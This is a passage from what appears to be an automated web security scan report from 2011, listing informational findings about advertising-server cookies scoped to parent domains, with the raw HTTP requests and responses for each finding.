2d3TaTYML11pzoZIlFkYCIGVGm_tUjxVd7495aTWd8W1uYfsa9nlK9dyZVYIz5pmDpzdU80QQkZpM_cVFXYTcTTPOspL-TBLfO2ZZ5wOsMI8xMfjrvrnuyo8Yez2B_AzlVUYglieXXogFqezIO3vueH6XrbdeOZqLTJ2eUC5VtOBQseHiE81nClsShNFF0lz8B3FOROwHTKbP2IH89nbviHBnlpbRDDco7mBS3_DJ0ZnqsKZKeTVpjW22ISOFg-eZ4nuypVotMax7cw1A0lomZOewLLuUzHWvz6IKIMXKnKL80iX025NYG1qkKS0O8LGs7luRUbTpMVbMDENDpvIJh2_kOeZwWW0-b-WJf0ZFlMOgj84vlCimF9cP6eLyeThS4cELoZF7hIMY-yiS6od8aiwiVy6K8hyJ0-yKCmYc6DEnkoIDjLUURQ9jCbj0adNONAbHq6OIauKDPsVyaYkWyAz1a3QLsZ0HFEk9FUwZlIZoC4PKchFMfXO25PtkA1FJuDF1eIqRRk7NbH_3KXaXpegXdoohM0M5HiSWAEvqit8JfBxvjBBCecmNOFvmnxZXlybKUM3qIhRpr8zAond1hyHy2KCxQ9jRTaSUh9q8NAYC-8-qkSZEZsmx23qKVCrqZDyeipaIi4-WrfUh7IPblkcEwLIfWk4JnPVlR_zGm4PPqzfx4-ZPuIxR87K17SR-59M9UpIVvIMltY5lVfKu7zjIgIpMBKB2P8TaeZb5SMS1Kn2fJf0-MGZW4U9vWHTndk9ZYnTYKRbzB2AW8sPYtx1gLnWIDsYBLT8b4yTE_t-fjXYNBuH2MTsqi1WP1f5naPDjKNVGGv49osHpNOU5hR-g_XrO60jJc9MudtXKgUybYsjSwmSw3Whqt4otLu1R9f4pMroY6TrnX9AFtcCOq4KtB3OqN2gLia6NWPazuloW1Dp_gmgtfmkSSGnmz7Ck--msIbUItDCaX4V_0YzpDgobT5myGAQ1jpLDCI7HiZjNNO0_95EX9SUHeo0SvSjgEUZJK2gWAKmardOPRrryF1DhECcp1-YMQnoV4ZAArTQ0YurxnNN6cMRpOMh2nE5XzpH9jU_75X6gaFQNyuWz4EiPqighnBW1K7ySrDy2erbCyocIlO9iKCeGUvo-FRYRZN7b2HzshKpWim7EvVYj9LxNPbnlLRl7SF6Fz-Cqk4ilR2m1sd6XpoV6J-HdTmFEl8Fex_S_sTGaqkuGDnpWV_Epn14CgCD-1Od2j93-G993DJLn6laQk0A_YEjXCNxN4ufXJe2s8taXVc1ZwCaKwQ-ReuFBa_BvA0MPyd7JlyBvMOrx4RsY1dMYwNR_ohNoy9a29HQKTTBeSdexy7NjxMrQdbG848mPsvXEVp1Zp9tlw0PafTHwRamGgGanwtSRVH2wEa3NxSTCsrM00Brun6QttnrZ4i40yYFMUM2IND36b7ZFw4; fc=qPpK4X8K7ZjxVx0VJZDcdB_D1mN3lHI_BinJ1LdrOAbDh9xILOy7cWXWYifPzZ3iZjzoSdlEeqq3zCQrton2D32iD1a2418t8vlUtDGalV-JhisFugd5-2PmgEb-dzYcx_84B0Gt7iZQiKNqGC2CofHgZs6hnwrt4AvKtyKV8klPR1hRXEWvUhiTNhz33U4d9hTEpcCaiTjdUImk_rGRYl95QzLPGgcS4PLuvzPSDFoeX72gpvVoMR_dT1IU83itQkcPCNDBJR1s8ojl7c8L5k9KWBxjpL-6lYKR74fQmyE; pf=WmCQSJv_88YAF1TaCEjacvtFyKtKd3nkimHPVBGJrCArW05u4B9BwnHxy5LHSNbs0PyvhiQ9hEGFvp1qMvxzBcdiicNNmmE_aI2n_-oR-aRG9eqUO6PdyPlHytyWBeL6pt4N9d3OY-Qo6M3zGftguNTbm-VGCKrn7KG61o8a-hlxQgbL-MXnxJnxbWK81XM2fNbwnskl80J7FrpArydV4msv5xJnc6wiNkkgoc9ZHAqEvAXfc_b9CYsOLM4ObfRS-yQ0IxDS6yGV0bt0Oz4pJzQ3Hu9GorHJq3pkzhhXE4dM0xncvVUD6tMlnnlm_qWsojASvNxNlCtZvel71OhRg1_acYxwuGBwWmnpT3WVNmeWKUlZO7GlHHuYkG_xUYpdlRr7vUCIaoiDaMmpt_PvLCOUyLGtO0hHJuwGY5T09JX2RCeAmas1by9-2jjXtHbxIU6XTk6RPEnQXT9x2zEmWfAeEJZ2W4XMeMQpqzhWB_34UH3sPqU14UWUW_0z8Z0heNyepssmwJo9AEHB3dcHG8NqNopQF7bmOYrUClo2LIAxUFIqqMfzF-f5IilV9DF2EEtf1qwB8GY1P6ISMC2NEE-NukVybOAFf3snxZsusnThrdw025CqgpXbAJf_ZgK04z5LE7vpNsVQaepPKy5giom1bq2yFvVGruUD-0Zmu_IOz-UlYiPBN7JyoSoKGJwMowB-sj_YCAwsoyO3MSAriA-6SvpE8vfm17M_AiAxw4nAd1Y9GjRixW8BKZaPBicaTSnQ_qW1THdHtsDrSOwE7yWjUosqwui97JSt4J0g_MOMd0ReLIPTEksHwzd4gYkpoMm2n6Nulr0bAVvGt4WcZWdCKTjb3Ww3q4Lyh_VyGMuPK371XlXjo5X46eVqRbV699MOJ5eDdshYLSs5LFoOgILjO_vdFh0XnPmUquTICkH1HrsiJSZNWOX0SyN8dywaeYYZUTlRetsuBzMcxMWLQLNyiRU1bJ5Qpb7GomgPhXBwcMjXa09KP5HzekSxDcQK0SJw0JMmSyeQM3pYTVx-Ci-FU5aKfMy17HNvPHxNvxNrRXY1izURX-lyALi1AlxuBXTDiJUS-OqKWjm2DD4CuggKG3dUzHMmu04fSX5Ad4nEc6NlGzZLMuoExgCCt30kp2pmOmYcQYMZyZ05DubgihMl8PJOwcr8ldScAKqk7rGGnUh27gMWCyrnP1Di5AGzTucfcXTrqV1UJKyBhGxFYcQFai9M2J3rqJmFUgQdN5ATDIRwfK3uozaJUKhU4qVipaL_GD-TOTelik5DYCvXIYIInb3nfIa-ebQa7olHWWH486R4yxje4LN8GWCWWRe4IR0I9DtTjuVzRJkyZ8n66XpUPlCRi3tlvuMEH6BKrtjGsUA2wOoIXFuaM_JUwMHDgab4_aPrZdgl9Uf7tvD9rgyRTxnR6YKNm8Gu6ALXRmCYGTIP8i-wsqx8QkqNgi0F_hs9UZaVZDpy-HyTAsx-Y51cz4yJITcb0FaAWC4QbaWSbbOECFNVbSmOiTVVH4eEKD1WvX5M7UplxrzwIhN9Mwkgo1sMiNanUUl1UyNj_Qxjp4iBCha2ShvDZxpY4-NTPO_cWHxychz2AkV4XXIJ0g; uid=2931142961646634775; rrs=1%7C2%7C3%7C4%7C1002%7C6%7C7%7C7%7C9%7C1001%7C1006%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7C1007%7C1008; rds=15093%7C15093%7C15093%7C15104%7C15085%7C15097%7C15097%7C15082%7C15093%7C15093%7C15091%7C15093%7C15093%7C15093%7Cundefined%7C15093%7Cundefined%7C15097%7C15093; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Sat, 05-Nov-2011 14:00:03 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:02 GMT
Content-Length: 336

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=2819581112640559492&fpid=12&nu=n&t
...[SNIP]...

9.7. http://admeld.adnxs.com/usersync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(Hcd2V-98k^bd*F+<znTL2]8%/jHD=5GIablQaj1T:+`)zrd1=majNg:ONjO>+82L6e*h.`=y@ao43RDO58T![k)6!=WY9w/>LgC0ua]n^t9r7oLP9_MR@8bPbEM847ea^)aQDU!K8:8Mib6U0k<hxzjjc[Au-0<H<LXM#U5[eZ^afi8c^pVP+AZX@q#/1Yqvbtbx4+dqj`fk[s:L()qUlmtKi<9%GO3-N#?aXT5?1fj<hBx)/6Z@XtG.bxqYY)ts/akPQP2zii]#7P.g2Q_sE9Gz4:Dy)!/w1/x6[P]Eqz?pW%7>6Mwdg]0aq`?CM8*+L5fjlMlfBgN+A'YarJt+k/-ctwQ^Uq-P<*PApFh(RhKd*E6R]:CYB02[GzruJZ?an)NJ`vwQv>AW.v4iD:)aFh_y<`>^2lo$qk8$w+Ytq`ut.@:47cEgPirxft1)9PZ`[aV<=%*'4ao'@v@CMN'*.1GQ4dz.</o#@qpnB8>5[3h/Bt1dKrd6[glkJgTQ($k9''V5?XzRTik7Bs=T:e?z(RgMdLBBv=7H7j/W:X6Kx[EHFW>3riVr9(#PFxXdrMKvO`+qJ_t(SwiD!=%5^x+$H=Zk']d3xQ_@d[

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:00:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:00:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 14:00:15 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

9.8. http://ads.adbrite.com/adserver/vdi/742697  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&rnd=8532944041141139446&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; b="%3A%3Axews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; ut="1%3AXZFJtsIgEEX3wjgDGtMcdxMEE35oQhNzorh3AX88xumtW6%2Bq4AFuGJwfYOLbahzz4AzcKtUSkVW%2BbSOKsMrAZzC3rIDLOHaDhf0tQTkEFXGklRdCk2xRWNoi%2BptgdnU94ToM7xJPLmaVteS%2BJtIRJxNB9e5dzcHbqTpQL7mUidCwmtjGhpKPqH%2FaZSO25pQpg4ss2%2FuJhDlrVqOy6EmZtKhTRpfhlnX%2FV5ZIUR9n95j1%2Be6x8%2B8zF5MysXcpbN6uWsdURuG%2BvxLHuX%2BEw1do016%2BQ0EFaK81d6J8AHg%2BXw%3D%3D"; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C86xtm%2C1uo0%7Clkkk10%2C86egg%2C1uo0%7Clkkk0s%2C873x5%2C1uo0%7Clkkz7b%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C8413g%2C1uo0%7Clkl4dq%2C86eg6%2C1uo0%7Clkkk0h%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh%7Clkkz71"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 09 May 2011 14:00:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Tue, 10-May-2011 14:00:11 GMT
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgocCgY3MTIxNTYY6Nv74xMiDHhyZDUyemt3anV4aAojCgY3NDI2OTcYm9WOzw4iEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQhJaVmQoYpNGM7RMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; path=/; domain=.adbrite.com; expires=Sun, 07-Aug-2011 14:00:11 GMT
Set-Cookie: ut="1%3AXZDJloMgEEX%2FhbULhiie%2FI0EokQGGRKPCfn3Bjr2ib293Ee9qhd4YHB%2BgVlsq%2FU8gDPwq9L3hJwOlCaUYFNAKGChvILLNPWjg8MjQzVGnXBiTZDSkGIxWGMJ3WZYXNPOuI3j75PILuaNc%2BS5ZtITrzJB7e5d7cHbqT7QoIRSmbC42kRTx8ifaP7FVSe37lQoh3dV24eZxKVozqBa9KRtLuq1NXW44%2F1ny%2FqlbI%2BzcfA5tmxXY9KQEIrP%2FR4CF3OC41e8o5fvOGgAG4wRXtZTg%2Ff7Bw%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 06-May-2021 14:00:11 GMT
Set-Cookie: vsd=0@1@4dc7f36b@cdn.turn.com; path=/; domain=.adbrite.com; expires=Wed, 11-May-2011 14:00:11 GMT
Set-Cookie: fq=; path=/; domain=.adbrite.com; expires=Mon, 09-May-2011 14:00:11 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

9.9. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1291095E86820110502141346&flash=10&time=1|8:59|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/w%3B240293018%3B0-0%3B1%3B63773644%3B4986-300/600%3B42004857/42022644/1%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-87971011_1304949578%2C11f8f328940989e%2Cent%2Cax.-cm.ent_l-cm.music_h-ti.aal-bz.25-dx.16-dx.23-dx.17-rt.truecredit2-qc.ae-qc.ac-idgt.careers_l%3B%3Btgt%3Dbrand%3Bcmw%3Dowl%3Bsz%3D300x600%3Bnet%3Dcm%3Bord1%3D680525%3Bcontx%3Dent%3Ban%3D%3Bdc%3Dw%3Bbtg%3Dcm.ent_l%3Bbtg%3Dcm.music_h%3Bbtg%3Dti.aal%3Bbtg%3Dbz.25%3Bbtg%3Ddx.16%3Bbtg%3Ddx.23%3Bbtg%3Ddx.17%3Bbtg%3Drt.truecredit2%3Bbtg%3Dqc.ae%3Bbtg%3Dqc.ac%3Bbtg%3Didgt.careers_l%3B%7Eaopt%3D2/1/e454/0%3B%7Esscs%3D%3f$CTURL$&r=0.22781705926172435 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CEJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=7DA20400-C8FF-C732-0209-A310000A0200; PRca=|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 11740
Set-Cookie:PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAY0aKAxsCAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D8A20400-6340-8A46-0309-A4900C6C0200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

9.10. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=I10982 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; 